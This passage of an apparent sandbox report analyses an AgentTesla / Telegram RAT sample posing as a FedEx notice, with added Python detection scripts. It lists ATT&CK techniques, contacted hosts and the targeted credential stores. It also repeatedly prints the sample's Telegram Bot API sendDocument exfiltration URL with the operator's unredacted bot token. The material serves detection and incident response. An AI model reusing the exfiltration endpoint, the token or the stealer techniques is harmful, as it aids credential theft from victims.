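        kind, artifact = m.groups()
        for pattern, app, category, technique in RULES:
            if re.search(pattern, artifact, flags=re.I):
                hits.append({"app": app, "category": category, "technique": technique,
                             "access": kind, "artifact": normalize(artifact)})
                break  # first matching rule wins; unmatched rows are ignored
    return hits


def summarize(hits):
    """Category -> sorted list of targeted applications, for the triage note."""
    by_cat = {}
    for h in hits:
        by_cat.setdefault(h["category"], set()).add(h["app"])
    return {c: sorted(apps) for c, apps in sorted(by_cat.items())}


if __name__ == "__main__":
    found = classify(REPORT_ROWS)
    print(summarize(found))
    for h in found:
        print(h["technique"], h["access"], h["artifact"])
```

The normalised artifact strings are what go into a hunting query; the access kind matters because file reads and registry key opens are logged by different telemetry sources, and because only the registry accesses (Outlook, IncrediMail, WinSCP) are visible without file-access auditing.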

                      Remote Access Functionality:

                      Yara detected Telegram RAT
                      Source: Yara match | File source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR
                      Yara detected AgentTesla
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fa3860.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fa3860.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000000.257251923.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000000.257782427.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.514650311.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5244, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe PID: 5604, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Bracketed digits reproduce the superscript markers the original matrix attaches to techniques that matched a signature; techniques without a marker are the matrix template only.

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation [211] | Path Interception | Process Injection [12] | File and Directory Permissions Modification [1] | OS Credential Dumping [2] | System Information Discovery [114] | Remote Services | Archive Collected Data [11] | Exfiltration Over Other Network Medium | Web Service [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Command and Scripting Interpreter [2] | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools [1] | Input Capture [11] | Query Registry [1] | Remote Desktop Protocol | Data from Local System [2] | Exfiltration Over Bluetooth | Encrypted Channel [11] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information [1] | Credentials in Registry [1] | Security Software Discovery [211] | SMB/Windows Admin Shares | Email Collection [1] | Automated Exfiltration | Non-Application Layer Protocol [2] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information [2] | NTDS | Process Discovery [2] | Distributed Component Object Model | Input Capture [11] | Scheduled Transfer | Application Layer Protocol [3] | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing [13] | LSA Secrets | Virtualization/Sandbox Evasion [131] | SSH | Clipboard Data [1] | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading [11] | Cached Domain Credentials | Application Window Discovery [1] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion [131] | DCSync | Remote System Discovery [1] | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection [12] | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | 40% | ReversingLabs | Win32.Trojan.AgentTesla

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
                      1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
                      1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label
                      http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
                      http://DynDns.comDynDNS | 0% | URL Reputation | safe
                      https://api.telegram.org4 | 0% | URL Reputation | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
                      https://190L8dvjH7GrrK.net | 0% | Avira URL Cloud | safe
                      http://yWRCNh.com | 0% | Avira URL Cloud | safe
                      https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
                      https://api.ipify.org% | 0% | URL Reputation | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
                      https://api.telegram.orgD8 | 0% | URL Reputation | safe
                      https://190L8dvjH7GrrK.netP | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      api.telegram.org | 149.154.167.220 | true | false | | high

                        Contacted URLs

                      Name | Malicious | Antivirus Detection | Reputation
                      https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument | false | | high
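The contacted URL is the whole command-and-control story for this sample: the Telegram Bot API puts the bot token in the URL path, so each sendDocument call carries the credential the operator uses to receive the stolen data, and the domain itself is legitimate and has a "high" reputation in the table. That has two practical consequences for responders: the bot id and token are the IOC to extract and share (redacted in public write-ups, in full to Telegram's abuse contact for revocation), and detection has to key on the URL path and the calling process rather than on the destination. The script below is an added example, not part of the Joe Sandbox report or of the sample: it pulls the bot id, secret and API method out of URLs in the form above, produces a redacted token for reporting, and applies a small severity rule to constructed proxy log lines. The log format, the host allowlist, the method list and the token length bound are assumptions.

```python
import re
from collections import namedtuple

# Bot API URLs as they appear in this report (the token is the one the sample
# embeds; it is already public in the report above).
REPORT_URLS = [
    "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument",
    "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/",
]

# Constructed proxy log lines (not from the report): time, host, process, verb, URL.
PROXY_LOG = """\
2021-11-22T10:01:02Z ws17 chrome.exe GET https://web.telegram.org/
2021-11-22T10:01:09Z ws17 FedEx_Shipment_Notification.exe POST https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument
2021-11-22T10:02:30Z build03 python.exe POST https://api.telegram.org/bot5550001:AAHlongplaceholdersecretvalue00000000/getUpdates
"""

# A bot token is "<numeric bot id>:<secret>"; the secret in this report is 35
# characters of [A-Za-z0-9_-]. The lower length bound is a lenient assumption.
TOKEN_RE = re.compile(r"api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{30,})/(\w*)")

# Hosts allowed to use the Bot API at all (assumption for the demonstration).
BOT_HOST_ALLOWLIST = {"build03"}
# Bot API methods that move data off the endpoint.
EXFIL_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}

Alert = namedtuple("Alert", "ts host process bot_id method severity")


def extract_bot_token(url):
    """Return (bot_id, secret, api_method) or None if the URL is not a Bot API call."""
    m = TOKEN_RE.search(url)
    return m.groups() if m else None


def redact(bot_id, secret):
    """Token form that is safe to put in a shared report: id plus a 4-char prefix."""
    return f"{bot_id}:{secret[:4]}" + "*" * (len(secret) - 4)


def report_iocs(urls):
    """Deduplicated, redacted bot tokens keyed by bot id, for an IOC write-up."""
    found = {}
    for url in urls:
        tok = extract_bot_token(url)
        if tok:
            found[tok[0]] = redact(tok[0], tok[1])
    return found


def scan_proxy_log(log_text):
    """Flag Bot API traffic; exfil methods from any host are high, the rest
    depends on whether the host is an approved bot runner."""
    alerts = []
    for line in log_text.splitlines():
        ts, host, process, _http_verb, url = line.split(" ", 4)
        tok = extract_bot_token(url)
        if tok is None:
            continue
        bot_id, _secret, api_method = tok
        if api_method in EXFIL_METHODS:
            severity = "high"
        elif host in BOT_HOST_ALLOWLIST:
            severity = "info"
        else:
            severity = "medium"
        alerts.append(Alert(ts, host, process, bot_id, api_method, severity))
    return alerts


if __name__ == "__main__":
    print(report_iocs(REPORT_URLS))
    for a in scan_proxy_log(PROXY_LOG):
        print(a)
```

The severity rule is deliberately coarse. The point is that matching on api.telegram.org alone is useless because reputation services rate it safe and legitimate bots use it, while matching on the bot path plus an exfil method plus a process that is not a known bot host isolates exactly the row this sample produces.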

                          URLs from Memory and Binaries

All sources below are memory dumps of FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe; only the dump identifiers are listed.

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://DynDns.comDynDNS | 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org4 | 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocumentdocument----- | 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | false | | high
https://190L8dvjH7GrrK.net | 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/ | 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | false | | high
http://yWRCNh.com | 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org%GETMozilla/5.0 | 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://api.telegram.org | 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmp, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | false | | high
https://api.ipify.org% | 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.orgD8 | 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://190L8dvjH7GrrK.netP | 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                    Contacted IPs


                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
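The only contacted host is api.telegram.org, and the contacted URL is a Bot API sendDocument call whose path carries the bot token itself. That makes the exfiltration channel easy to alert on from proxy or TLS-inspection logs that record full URLs (without inspection, the SNI api.telegram.org from an unexpected process is still enough). The following detection logic is an added example, not part of the Joe Sandbox report or the sample: it parses constructed proxy-style log lines (timestamp, client IP, process name, method, URL; this format, the process allowlist and the second bot token are assumptions), flags Bot API uploads from processes that have no business using it, masks the token so the alert does not itself leak a usable credential, and checks whether the same process fetched its public IP from api.ipify.org shortly before, which is the sequence the report shows.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from urllib.parse import urlparse

# Constructed proxy-style log lines: "<time> <client> <process> <method> <url>".
# The first Telegram URL is the one carved from the sample's memory in the
# report above; hosts, timestamps, the benign lines and the second bot token
# are invented for this example.
SAMPLE_LOG = """\
2021-11-25T18:48:30Z 10.0.0.12 chrome.exe GET https://www.bing.com/
2021-11-25T18:48:31Z 10.0.0.12 "FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe" GET https://api.ipify.org/
2021-11-25T18:48:32Z 10.0.0.12 "FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe" POST https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument
2021-11-25T18:50:00Z 10.0.0.40 python.exe GET https://api.telegram.org/bot123456789:AAEexampleTOKENforAlertingBot_12345/getUpdates
"""

LINE = re.compile(r'^(\S+)\s+(\S+)\s+("[^"]*"|\S+)\s+(\S+)\s+(\S+)$')
# Bot API URLs embed the credential in the path: /bot<id>:<secret>/<method>
BOT_URL = re.compile(
    r'https?://api\.telegram\.org/bot(?P<id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)')

# Methods that push data out of the host; sendDocument is what the sample used.
UPLOAD_METHODS = frozenset({"sendDocument", "sendPhoto", "sendVideo", "sendMessage"})
# Hypothetical allowlist of processes permitted to use the Bot API (alerting scripts etc).
ALLOWED_PROCESSES = frozenset({"python.exe"})
# Public-IP lookup services; the report shows the sample hitting api.ipify.org.
IP_LOOKUP_HOSTS = frozenset({"api.ipify.org"})


@dataclass
class Finding:
    time: str
    client: str
    process: str
    bot_id: str
    token_hint: str   # masked secret, enough to correlate, not to reuse
    api_method: str
    severity: str     # "high", "medium" or "low"


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def mask_token(secret):
    """Keep two leading and four trailing characters of the bot secret."""
    return f"{secret[:2]}...{secret[-4:]}"


def find_telegram_bot_exfil(log_text, allowed=ALLOWED_PROCESSES):
    """Return one Finding per log line that calls the Telegram Bot API."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        time, client, process, _http_method, url = m.groups()
        process = process.strip('"')
        bot = BOT_URL.search(url)
        if not bot:
            continue
        if process in allowed:
            severity = "low"
        elif bot["method"] in UPLOAD_METHODS:
            severity = "high"      # unexpected process pushing data to a bot
        else:
            severity = "medium"    # unexpected process, but no upload yet
        findings.append(Finding(time, client, process, bot["id"],
                                mask_token(bot["secret"]), bot["method"], severity))
    return findings


def preceded_by_ip_lookup(log_text, finding, window_s=300):
    """True if the same client+process queried a public-IP service within window_s before."""
    t_end = parse_ts(finding.time)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        time, client, process, _http_method, url = m.groups()
        if client != finding.client or process.strip('"') != finding.process:
            continue
        if urlparse(url).hostname in IP_LOOKUP_HOSTS:
            delta = (t_end - parse_ts(time)).total_seconds()
            if 0 <= delta <= window_s:
                return True
    return False


if __name__ == "__main__":
    for f in find_telegram_bot_exfil(SAMPLE_LOG):
        tag = " (public IP looked up first)" if preceded_by_ip_lookup(SAMPLE_LOG, f) else ""
        print(f"[{f.severity}] {f.time} {f.client} {f.process}: bot {f.bot_id} "
              f"token {f.token_hint} {f.api_method}{tag}")
```

The allowlist is deliberately small: Telegram Desktop does not use api.telegram.org at all, so Bot API traffic from an endpoint is either an automation script you know about or something to look at. The bot id and masked token are enough to tie later sightings to the same operator across hosts.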

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:528766
                                    Start date:25.11.2021
                                    Start time:18:47:26
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 18s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:23
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
                                    EGA Information:Failed
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 92.122.145.220
                                    • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

Time | Type | Description
18:48:26 | API Interceptor | 788x Sleep call for process: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe modified

                                    Joe Sandbox View / Context

                                    IPs

Match: 149.154.167.220
Associated samples (all detected as malicious):
• ORDER #63457-BLS.exe
• TmVqivwYxc.exe
• Purchase Order.exe
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
• LNdP6FAphu.exe
• ORDER #63457-BLS.exe
• Ordine_di_acquisto_6010921doc.vbs
• AsWdTqKLGU.exe
• Sales Order Confirmation.exe
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
• wz7FRFwqp8.exe
• order.exe
• URGENT ORDER.vbs
• HSBC Payment Advice - Customer REF A0019G1109_100182.exe
• quote.exe
• Quote request 2295.exe
• Payment-Copy22112021.exe
• Order_172PDF.exe
• NEW ORDER FROM CANADA.vbs
• HSBC Payment Advice - Customer REF A0019G1109_100182.exe

                                                                            Domains

Match: api.telegram.org
Associated samples (all detected as malicious; context: IP the domain resolved to):
• 20211125 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsx (149.154.167.220)
• ORDER #63457-BLS.exe (149.154.167.220)
• TmVqivwYxc.exe (149.154.167.220)
• Purchase Order.exe (149.154.167.220)
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe (149.154.167.220)
• LNdP6FAphu.exe (149.154.167.220)
• ORDER #63457-BLS.exe (149.154.167.220)
• Ordine_di_acquisto_6010921doc.vbs (149.154.167.220)
• AsWdTqKLGU.exe (149.154.167.220)
• 20211118 CIRCULAR ANULACION CUENTA BANCARIA BANKIA.xlsx (149.154.167.220)
• DHL OVERDUE PAYMENT FILE 1041.exe (149.154.167.220)
• Sales Order Confirmation.exe (149.154.167.220)
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe (149.154.167.220)
• wz7FRFwqp8.exe (149.154.167.220)
• order.exe (149.154.167.220)
• URGENT ORDER.vbs (149.154.167.220)
• HSBC Payment Advice - Customer REF A0019G1109_100182.exe (149.154.167.220)
• quote.exe (149.154.167.220)
• Quote request 2295.exe (149.154.167.220)
• Payment-Copy22112021.exe (149.154.167.220)

                                                                            ASN

Match: TELEGRAMRU
Associated samples (all detected as malicious; context: contacted IP in this ASN):
• Tk6dsSEyOC.exe (149.154.167.99)
• ORDER #63457-BLS.exe (149.154.167.220)
• TmVqivwYxc.exe (149.154.167.220)
• 3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exe (149.154.167.99)
• Purchase Order.exe (149.154.167.220)
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe (149.154.167.220)
• LNdP6FAphu.exe (149.154.167.220)
• dIVWfjBCXV.exe (149.154.167.99)
• UYsk9P766s.exe (149.154.167.99)
• ORDER #63457-BLS.exe (149.154.167.220)
• F06FA33D36606CF5A9DD11FE35348EB6A3E8871367CE4.exe (149.154.167.99)
• Ordine_di_acquisto_6010921doc.vbs (149.154.167.220)
• AsWdTqKLGU.exe (149.154.167.220)
• Sales Order Confirmation.exe (149.154.167.220)
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe (149.154.167.220)
• wz7FRFwqp8.exe (149.154.167.220)
• order.exe (149.154.167.220)
• URGENT ORDER.vbs (149.154.167.220)
• HSBC Payment Advice - Customer REF A0019G1109_100182.exe (149.154.167.220)
• zMvP34LhcZ.exe (149.154.167.99)

                                                                            JA3 Fingerprints

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated samples (all detected as malicious; context: IP contacted with this JA3 client fingerprint):
• #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe (149.154.167.220)
• DHL_119040 ontvangstbewijs,pdf.exe (149.154.167.220)
• ORDER #63457-BLS.exe (149.154.167.220)
• TmVqivwYxc.exe (149.154.167.220)
• g3g1VECs9K.exe (149.154.167.220)
• SecuriteInfo.com.ArtemisEC35A67F3663.5978.exe (149.154.167.220)
• Purchase Order.exe (149.154.167.220)
• Waldo Orden de Compra -SA112421,pdf.exe (149.154.167.220)
• PROPOSAL CATALOG.exe (149.154.167.220)
• FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe (149.154.167.220)
• LNdP6FAphu.exe (149.154.167.220)
• Zkb2VENJ38.exe (149.154.167.220)
• ORDER 759325.exe (149.154.167.220)
• pH7pQDWJPP.exe (149.154.167.220)
• oZPv3ngzrx.exe (149.154.167.220)
• a.dll (149.154.167.220)
• NEW PURCHASE ORDER,PDF.EXE (149.154.167.220)
• qG92QcOmb4.exe (149.154.167.220)
• CheatValorant2.2.exe (149.154.167.220)
• New Order.exe (149.154.167.220)

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.log
                                                                            Process:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2239
                                                                            Entropy (8bit):5.354287817410997
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                                                            MD5:913D1EEA179415C6D08FB255AE42B99D
                                                                            SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                                                            SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                                                            SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                                                            Malicious:true
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                            C:\Users\user\AppData\Roaming\becfyxbg.kps\Chrome\Default\Cookies
                                                                            Process:C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                            Category:modified
                                                                            Size (bytes):20480
                                                                            Entropy (8bit):0.698304057893793
                                                                            Encrypted:false
                                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
